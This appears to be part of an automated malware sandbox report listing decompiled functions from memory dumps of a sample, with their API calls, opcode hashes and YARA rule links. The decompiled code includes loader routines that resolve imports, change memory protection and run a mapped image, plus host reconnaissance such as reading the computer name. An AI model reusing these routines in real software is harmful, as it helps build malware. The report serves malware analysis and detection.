Uniqueness Score: -1.00%

Function 0038133E, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0038133E() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x384144;
				if( *0x38412c > 5) {
					_t16 = _t15 + 0x3850f4;
				} else {
					_t16 = _t15 + 0x3850b1;
				}
				E00381B3D(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E0038140B( &_v32,  &_v16,  *0x384140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x384138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E00381266(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x384138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E00381E8D(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00381344
0x00381355
0x0038135f
0x00381357
0x00381357
0x00381357
0x00381366
0x0038136f
0x00381374
0x00381392
0x003813ed
0x00381394
0x0038139a
0x003813a0
0x003813a0
0x003813ae
0x003813b2
0x003813b9
0x003813bb
0x003813bf
0x003813c1
0x003813c8
0x003813dc
0x003813ca
0x003813d0
0x003813d5
0x003813c8
0x003813e4
0x003813e4
0x003813ef

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 0038139A
memcpy.NTDLL(?,?,00000002), ref: 003813D0
ExitThread.KERNEL32 ref: 003813EF

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: 03fd21cc3eb4f1914956fd31e049acde3430e5a42b4efa184325f45dc02e576f
Instruction ID: 19fe11ed32aa94cde1e49bec2f97241bdb54990b639bae98d26baf724d98ede4
Opcode Fuzzy Hash: 03fd21cc3eb4f1914956fd31e049acde3430e5a42b4efa184325f45dc02e576f
Instruction Fuzzy Hash: 3E11B271104306ABDB23EBB1DC48D9777ECAF44340F0509A5F545DB961FB60E5468B51

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8F16, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BA8F16(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00BA6466(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xbad2a4; // 0x44fa5a8
						_t20 = _t68 + 0xbae1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00BA92F3(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00ba8f1c
0x00ba8f1f
0x00ba8f2f
0x00ba8f38
0x00ba8f3c
0x00ba900a
0x00ba9010
0x00ba9010
0x00ba8f56
0x00ba8f5b
0x00ba8f5f
0x00ba8f65
0x00ba8f6a
0x00ba8f71
0x00ba8f80
0x00ba8f80
0x00ba8f84
0x00ba8f86
0x00ba8f92
0x00ba8f9d
0x00ba8fa8
0x00ba8fac
0x00ba8fb6
0x00ba8fba
0x00ba8fbc
0x00ba8fc1
0x00ba8fc8
0x00ba8fd8
0x00ba8fd8
0x00ba8fc1
0x00ba8fba
0x00ba8fda
0x00ba8fdf
0x00ba8fe4
0x00ba8fe4
0x00ba8fe7
0x00ba8ff0
0x00ba8ff5
0x00ba8ff5
0x00ba8ffa
0x00ba8fff
0x00ba8fff
0x00ba8ffa
0x00ba8f84
0x00ba9001
0x00ba9007
0x00000000

APIs

Part of subcall function 00BA6466: SysAllocString.OLEAUT32(80000002), ref: 00BA64C3
Part of subcall function 00BA6466: SysFreeString.OLEAUT32(00000000), ref: 00BA6529

SysFreeString.OLEAUT32(?), ref: 00BA8FF5
SysFreeString.OLEAUT32(00BA6843), ref: 00BA8FFF

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 46c49d12fe7fcbba0912c248dd2ca8094dcb3f6947840a7fd0fad70e101a970e
Instruction ID: 2babb2918bb9798b8893ddd45f4240dfd2c132c72edacec2563cb02819874483
Opcode Fuzzy Hash: 46c49d12fe7fcbba0912c248dd2ca8094dcb3f6947840a7fd0fad70e101a970e
Instruction Fuzzy Hash: EB313B7150015AEFCB21DF94C888C9BBBBAFFCA7447144A98F9059B210D632ED91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA11D7, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00BA2227), ref: 00BA11F0

Part of subcall function 00BA8F16: SysFreeString.OLEAUT32(?), ref: 00BA8FF5

SysFreeString.OLEAUT32(00000000), ref: 00BA1231

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: c0ef00856e1c9ba8b88ad2c3e111e814de1d8ab05c1bfacc4198dc8244ab5232
Instruction ID: 9ebda144b3d254df30526b5ba83e89806a9dd270b6d355ad8c5ec8a7f6049e2e
Opcode Fuzzy Hash: c0ef00856e1c9ba8b88ad2c3e111e814de1d8ab05c1bfacc4198dc8244ab5232
Instruction Fuzzy Hash: 2E014F3550020ABFCB519FA8D9059AFBBB9EF49310B014462FA09E7120D730D915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6111, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00BA6111(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00BA8D59(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00BA677C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00ba6116
0x00ba6121
0x00ba6123
0x00ba6129
0x00ba612b
0x00ba6130
0x00ba6139
0x00ba613d
0x00ba6146
0x00ba614a
0x00ba6159
0x00ba614c
0x00ba614d
0x00ba6152
0x00ba6152
0x00ba614a
0x00ba613d
0x00ba6162

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00BA1DD9,73BCF710,00000000,?,?,00BA1DD9), ref: 00BA6129

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

GetComputerNameExA.KERNELBASE(00000003,00000000,00BA1DD9,00BA1DDA,?,?,00BA1DD9), ref: 00BA6146

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: af535101d2b21a793cbd55ada4ca60db6a88a6bfe654def0e867d0ad2b7e0bb6
Instruction ID: f51e5f14fae88f1284f427289080d3eed9dc25318a9de0c4c5972c813626d347
Opcode Fuzzy Hash: af535101d2b21a793cbd55ada4ca60db6a88a6bfe654def0e867d0ad2b7e0bb6
Instruction Fuzzy Hash: 1EF05466A04105FAE721DA9A9D01EAF7BFCDBC7750F1500AAA914E3241EA70DE019770

Uniqueness

Uniqueness Score: -1.00%

Function 00BA918C, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xbad23c) == 0) {
						E00BA20BE();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xbad23c) == 1) {
						_t10 = E00BA1000(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x00ba9193
0x00ba9194
0x00ba9197
0x00ba91c9
0x00ba91cb
0x00ba91cb
0x00ba9199
0x00ba919a
0x00ba91af
0x00ba91b6
0x00ba91b8
0x00ba91b8
0x00ba91b6
0x00ba919a
0x00ba91d3

APIs

InterlockedIncrement.KERNEL32(00BAD23C), ref: 00BA91A1

Part of subcall function 00BA1000: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BA91B4,?), ref: 00BA1013

InterlockedDecrement.KERNEL32(00BAD23C), ref: 00BA91C1

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 418f42dc39d167a44ffe83062e2734e916ececc2931bc721cb31c9742eb0a5ff
Instruction ID: a0999527bfbd65ccea4704254278ea01586ba17afa16c0818ba38b9640470094
Opcode Fuzzy Hash: 418f42dc39d167a44ffe83062e2734e916ececc2931bc721cb31c9742eb0a5ff
Instruction Fuzzy Hash: F0E0463124C223B386312BA88D0EB6AEAC5EB53F81F000495F982F14A4DA10CC40F2A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5974, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00BA5974(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xbad2a4; // 0x44fa5a8
				_t4 = _t15 + 0xbae39c; // 0x50a8944
				_t20 = _t4;
				_t6 = _t15 + 0xbae124; // 0x650047
				_t17 = E00BA8F16(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00BA97DE(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00ba597e
0x00ba5985
0x00ba5986
0x00ba5987
0x00ba5988
0x00ba598e
0x00ba5993
0x00ba5993
0x00ba599d
0x00ba59af
0x00ba59b6
0x00ba59e4
0x00ba59b8
0x00ba59ba
0x00ba59bf
0x00ba59e1
0x00ba59c1
0x00ba59c4
0x00ba59cb
0x00ba59d0
0x00ba59d2
0x00ba59d2
0x00ba59d7
0x00ba59d7
0x00ba59bf
0x00ba59eb

APIs

Part of subcall function 00BA8F16: SysFreeString.OLEAUT32(?), ref: 00BA8FF5

Part of subcall function 00BA97DE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00BA6186,004F0053,00000000,?), ref: 00BA97E7
Part of subcall function 00BA97DE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00BA6186,004F0053,00000000,?), ref: 00BA9811
Part of subcall function 00BA97DE: memset.NTDLL ref: 00BA9825

SysFreeString.OLEAUT32(00000000), ref: 00BA59D7

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 36d372d7134eee8148583839ee519743d2f3b0173bc1815b19e497c8fd6d7cb2
Instruction ID: 34a13e386872c5cf01185eb7120183723214f3387a4eaa683861ab2972b59b88
Opcode Fuzzy Hash: 36d372d7134eee8148583839ee519743d2f3b0173bc1815b19e497c8fd6d7cb2
Instruction Fuzzy Hash: A7017C32508519FFDB229FA8DC069ABBBF9EF06760F0144A5EA05EB060E770DE51C790

Uniqueness

Uniqueness Score: -1.00%

Function 00381B3D, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00381B3D(void* __eax, intOrPtr _a4) {

				 *0x384150 =  *0x384150 & 0x00000000;
				_push(0);
				_push(0x38414c);
				_push(1);
				_push(_a4);
				 *0x384148 = 0xc; // executed
				L003810D6(); // executed
				return __eax;
			}

0x00381b3d
0x00381b44
0x00381b46
0x00381b4b
0x00381b4d
0x00381b51
0x00381b5b
0x00381b60

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(0038136B,00000001,0038414C,00000000), ref: 00381B5B

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: e06ad55da204ec28cde9a32ce5b6bd57c089da87213db1ffd3c740a055ca6b1c
Instruction ID: 0536b2a49d09d8b9ad7513e6cf22833c29390fc5ac317f56a3019e6aaf5b807f
Opcode Fuzzy Hash: e06ad55da204ec28cde9a32ce5b6bd57c089da87213db1ffd3c740a055ca6b1c
Instruction Fuzzy Hash: 9BC04CB4140342A6E622AB40BC4EF457A567760B05F114584F11025AD1D3F511D48715

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8D59, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA8D59(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xbad238, 0, _a4); // executed
				return _t2;
			}

0x00ba8d65
0x00ba8d6b

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b0d228b00800eec07b0fb5414741241edf67a448fcc9391e63ff51ae2a5a9954
Instruction ID: 45298a6b55fb4b81b27b79c50a8d00232342693f93fbe848f89ae04faaab0789
Opcode Fuzzy Hash: b0d228b00800eec07b0fb5414741241edf67a448fcc9391e63ff51ae2a5a9954
Instruction Fuzzy Hash: C3B01235000200FBCA114B00DD0AF05FF21AB51700F028010B201050708B314420EB15

Uniqueness

Uniqueness Score: -1.00%

Function 00381E8D, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00381E8D(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E003818E1( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E00381854( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E003810DC(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E003815BC(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E00381E78(_t35);
					L8:
					return _t28;
				}
			}

0x00381e95
0x00381eb2
0x00381eb9
0x00381f18
0x00000000
0x00381ebb
0x00381ebb
0x00381ec5
0x00381ec9
0x00381ece
0x00381ed7
0x00381edb
0x00381ee0
0x00381ee5
0x00381ee9
0x00381eee
0x00381eef
0x00381ef3
0x00381ef8
0x00381f00
0x00381f00
0x00381ef8
0x00381ee9
0x00381edb
0x00381f02
0x00381f0b
0x00381f0f
0x00381f19
0x00381f1f
0x00381f1f

APIs

Part of subcall function 003818E1: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00381EB7,?,?,?,?,00000002,?,003813E9), ref: 00381906
Part of subcall function 003818E1: GetProcAddress.KERNEL32(00000000,?), ref: 00381928
Part of subcall function 003818E1: GetProcAddress.KERNEL32(00000000,?), ref: 0038193E
Part of subcall function 003818E1: GetProcAddress.KERNEL32(00000000,?), ref: 00381954
Part of subcall function 003818E1: GetProcAddress.KERNEL32(00000000,?), ref: 0038196A
Part of subcall function 003818E1: GetProcAddress.KERNEL32(00000000,?), ref: 00381980

Part of subcall function 00381854: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00381EC5,?,?,?,?,?,?,00000002), ref: 0038188B
Part of subcall function 00381854: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 003818C0

Part of subcall function 003810DC: LoadLibraryA.KERNEL32 ref: 00381112
Part of subcall function 003810DC: lstrlenA.KERNEL32 ref: 00381128
Part of subcall function 003810DC: memset.NTDLL ref: 00381132
Part of subcall function 003810DC: GetProcAddress.KERNEL32(?,00000002), ref: 00381195
Part of subcall function 003810DC: lstrlenA.KERNEL32(-00000002), ref: 003811AA
Part of subcall function 003810DC: memset.NTDLL ref: 003811B4

Part of subcall function 003815BC: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 003815EA
Part of subcall function 003815BC: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00381642
Part of subcall function 003815BC: GetLastError.KERNEL32 ref: 00381648

GetLastError.KERNEL32(?,003813E9), ref: 00381EFA

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: fd89472fdfaf46cc1cda81dfb02716201ea346c21e75d9d47015a40d047d7023
Instruction ID: 562654cc63019044e884ce29787126bdd81ec4765fd0fb5226369cdbac1b7cbd
Opcode Fuzzy Hash: fd89472fdfaf46cc1cda81dfb02716201ea346c21e75d9d47015a40d047d7023
Instruction Fuzzy Hash: A011CC776007116BD72377E98C86DABB7ACAF54714B0102A8FA05D7201EBA4ED0687A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA3402, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00BA3402(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xbad330;
				E00BA94FB();
				while(1) {
					_t8 = E00BA523C(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00BA978C(_t14);
					if(_t15 == 0) {
						HeapFree( *0xbad238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00BA94FB();
					if(_t19 != 0) {
						_t22 =  *0xbad338; // 0x50a9b60
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x00ba340a
0x00ba340e
0x00ba340f
0x00ba3410
0x00ba3415
0x00ba341a
0x00ba3421
0x00ba3428
0x00000000
0x00000000
0x00ba342a
0x00ba342f
0x00ba3430
0x00ba3437
0x00ba3451
0x00000000
0x00ba3439
0x00ba3439
0x00ba343b
0x00ba343e
0x00ba3442
0x00000000
0x00000000
0x00ba3444
0x00ba3442
0x00ba3459
0x00ba3459
0x00ba345b
0x00ba3462
0x00ba3464
0x00ba346a
0x00ba3471
0x00ba3481
0x00ba3479
0x00ba347c
0x00ba347c
0x00ba3484
0x00ba3484
0x00ba348d
0x00ba348d
0x00ba3457
0x00000000

APIs

Part of subcall function 00BA94FB: GetProcAddress.KERNEL32(36776F57,00BA341A), ref: 00BA9516

Part of subcall function 00BA523C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BA5267
Part of subcall function 00BA523C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BA5289
Part of subcall function 00BA523C: memset.NTDLL ref: 00BA52A3
Part of subcall function 00BA523C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BA52E1
Part of subcall function 00BA523C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BA52F5
Part of subcall function 00BA523C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BA530C
Part of subcall function 00BA523C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BA5318
Part of subcall function 00BA523C: lstrcat.KERNEL32(?,642E2A5C), ref: 00BA5359
Part of subcall function 00BA523C: FindFirstFileA.KERNELBASE(?,?), ref: 00BA536F

Part of subcall function 00BA978C: lstrlen.KERNEL32(?,00000000,00BAD330,00000001,00BA3435,00BAD00C,00BAD00C,00000000,00000005,00000000,00000000,?,?,?,00BA568F,00BA5073), ref: 00BA9795
Part of subcall function 00BA978C: mbstowcs.NTDLL ref: 00BA97BC
Part of subcall function 00BA978C: memset.NTDLL ref: 00BA97CE

HeapFree.KERNEL32(00000000,00BAD00C,00BAD00C,00BAD00C,00000000,00000005,00000000,00000000,?,?,?,00BA568F,00BA5073,00BAD00C,?,00BA5073), ref: 00BA3451

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 4dd47ca196afc1379b0cd983434c0f8347d3c6105d27b636c47d3c74b3284568
Instruction ID: ede91fd79d9a66e0364b3dc8cb86ca0a9e41fdc3691c0f9e04427a3b93c28663
Opcode Fuzzy Hash: 4dd47ca196afc1379b0cd983434c0f8347d3c6105d27b636c47d3c74b3284568
Instruction Fuzzy Hash: 95014036608200AAEB115FE5CCC1B7A76D4DB4FB64F5000BAF945C7250CE60CE82A364

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2AFE, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA2AFE(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E00BA5974(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E00BA63A4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0xbad238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}

0x00ba2b06
0x00ba2b5d
0x00ba2b62
0x00ba2b08
0x00ba2b22
0x00ba2b26
0x00ba2b2b
0x00ba2b2d
0x00ba2b3f
0x00ba2b4b
0x00ba2b2f
0x00ba2b2f
0x00ba2b34
0x00ba2b39
0x00ba2b39
0x00ba2b2d
0x00ba2b26
0x00ba2b68

APIs

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00BA5CC9,?,004F0053,050A9378,00000000,?), ref: 00BA2B4B

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
